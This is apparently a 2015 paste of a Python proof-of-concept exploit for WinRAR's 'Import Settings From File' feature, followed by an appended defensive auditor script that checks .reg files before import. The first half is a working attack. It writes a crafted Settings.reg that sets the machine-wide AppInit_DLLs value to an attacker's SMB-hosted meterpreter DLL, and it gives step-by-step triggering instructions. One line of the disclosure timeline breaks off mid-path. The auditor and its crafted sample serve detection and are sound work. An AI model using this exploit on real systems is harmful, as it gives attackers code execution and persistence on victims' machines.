moften

WinRar Settings Import Command Execution

Oct 6th, 2015
#!/usr/bin/env python2
#
# Title : WinRar Settings Import Command Execution
# Date : 02/10/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Vulnerable Versions : WinRAR < 5.30 beta 4
#
# The vulnerability exists in the "Import Settings From File" function.
# Since the WinRAR settings file is saved as a registry file and WinRAR
# imports it automatically, without checking that it only writes to the
# registry keys used by WinRAR, we can create a specially crafted settings
# file and overwrite registry keys.
# Since we have access to the registry, there are various ways to use this
# to get code execution, such as defining "Run" keys or creating new
# services, etc. However, the best way to get code execution is using
# AppInit DLLs. AppInit DLLs are DLLs that are loaded into any process when
# it starts. In this case, we can specify a meterpreter DLL payload using a
# UNC path on an SMB server we control, and the next time a new process
# starts we will get a shell.
# Read more about AppInit DLLs: https://support.microsoft.com/en-us/kb/197571
#
# Triggering the vulnerability
# 1) Run this python script.
# 2) Open WinRAR
# 3) Click Options
# 4) Click Import/Export
# 5) Import Settings from file
# 6) Select the specially crafted Settings.reg file
#
# Disclosure Timeline:
# 01/10/2015 - Vendor contacted, PoC provided
# 02/10/2015 - Vendor released patch in WinRAR 5.30 beta 4 to verify the
#              presence of [HKEY_CURRENT_USER\Software\WinRAR] or
#              [HKEY_CURRENT_USER\Software\WinRAR\
#

# ASCII-art banner; a raw string keeps the backslashes literal.
banner = r""" ___        __        ____                 _     _
|_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |
 | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |
 | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___
|___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|
"""

print banner
print "[+] WinRar Settings Import Command Execution [+]\n"

dll = raw_input("[+] Enter dll location (smb) : ")

# String values in a .reg file escape backslashes, so double every
# backslash of the UNC path before embedding it.
dll = dll.replace("\\", "\\\\")

print "[+] Writing Content To Settings.reg [+]"

# Crafted settings file: instead of WinRAR's own keys under HKCU it writes
# the machine-wide AppInit_DLLs value and switches AppInit loading on.
evil = (
    "Windows Registry Editor Version 5.00\n\n"
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows]\n"
    '"AppInit_DLLs"="' + dll + '"\n'
    '"LoadAppInit_DLLs"=dword:00000001\n'
)

print evil

f = open("Settings.reg", "w")
f.write(evil)
f.close()

print "[+] Settings.reg created successfully [+]"
print "\n https://www.infogen.al/ \n"
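The disclosure timeline above says the vendor fix in WinRAR 5.30 beta 4 verifies that the imported file refers to [HKEY_CURRENT_USER\Software\WinRAR]. The script below is an added example (not part of the paste and not WinRAR's own code) of what such a pre-import check looks like from the defender's side: it parses a .reg file and, going one step beyond a presence check, rejects any section that is not under that subtree, so a file mixing legitimate WinRAR keys with an HKLM section still fails. It also flags the AppInit_DLLs / LoadAppInit_DLLs values the PoC writes. The function names, the value name "ExampleSetting" and the EXAMPLE-HOST UNC path are assumptions constructed for the example.

```python
#!/usr/bin/env python3
# Added example, not part of the original paste: audits a WinRAR-style
# settings (.reg) file before import. It models the check the disclosure
# timeline attributes to WinRAR 5.30 beta 4 and is deliberately stricter
# (every section must live under ALLOWED_ROOT). Names and samples are assumed.
import re

# Only this subtree holds WinRAR's own settings (from the timeline above).
ALLOWED_ROOT = r"HKEY_CURRENT_USER\Software\WinRAR"

# Value names that have no business in a settings import (case-insensitive).
SUSPICIOUS_VALUES = {"appinit_dlls", "loadappinit_dlls"}

REG_HEADER = "Windows Registry Editor Version 5.00"
SECTION_RE = re.compile(r"^\[(-?)(.+?)\]$")   # [KEY] or [-KEY] (deletion)
VALUE_RE = re.compile(r'^"([^"]+)"\s*=')       # "Name"=...


def parse_reg(text):
    """Return (header_ok, sections); each section records the key path,
    whether it is a deletion, and the value names it sets."""
    lines = text.splitlines()
    header_ok = bool(lines) and lines[0].strip() == REG_HEADER
    sections, current = [], None
    for raw in lines[1:]:
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = SECTION_RE.match(line)
        if m:
            current = {"key": m.group(2), "delete": m.group(1) == "-", "values": []}
            sections.append(current)
            continue
        if current is None:
            continue
        m = VALUE_RE.match(line)
        if m:
            current["values"].append(m.group(1))
        elif line.startswith("@="):
            current["values"].append("@")   # the key's default value
    return header_ok, sections


def key_is_allowed(key):
    """True if key equals ALLOWED_ROOT or lies beneath it (case-insensitive)."""
    k, root = key.lower(), ALLOWED_ROOT.lower()
    return k == root or k.startswith(root + "\\")


def audit_settings_file(text):
    """Return a list of findings; an empty list means the file only touches
    WinRAR's own subtree and sets nothing suspicious."""
    findings = []
    header_ok, sections = parse_reg(text)
    if not header_ok:
        findings.append("missing or unexpected .reg header")
    if not sections:
        findings.append("no registry keys found")
    for sec in sections:
        if not key_is_allowed(sec["key"]):
            findings.append("key outside %s: %s" % (ALLOWED_ROOT, sec["key"]))
        for name in sec["values"]:
            if name.lower() in SUSPICIOUS_VALUES:
                findings.append("persistence value %s under %s" % (name, sec["key"]))
    return findings


# Constructed samples: hypothetical value name, placeholder host.
LEGIT_REG = (
    "Windows Registry Editor Version 5.00\n\n"
    "[HKEY_CURRENT_USER\\Software\\WinRAR\\Interface]\n"
    '"ExampleSetting"=dword:00000001\n'
)

# Same shape as the Settings.reg the PoC above writes, with a placeholder UNC path.
CRAFTED_REG = (
    "Windows Registry Editor Version 5.00\n\n"
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows]\n"
    '"AppInit_DLLs"="\\\\\\\\EXAMPLE-HOST\\\\share\\\\payload.dll"\n'
    '"LoadAppInit_DLLs"=dword:00000001\n'
)

if __name__ == "__main__":
    for label, sample in (("legitimate", LEGIT_REG), ("crafted", CRAFTED_REG)):
        findings = audit_settings_file(sample)
        print("%s: %s" % (label, "OK" if not findings else "; ".join(findings)))
```

Because the vendor's described check only looks for the presence of the WinRAR key, a file that contains that key plus an extra HKLM section would still pass it; whitelisting every section, as above, closes that gap, and the value-name check gives a second, independent signal when the file is reviewed after the fact.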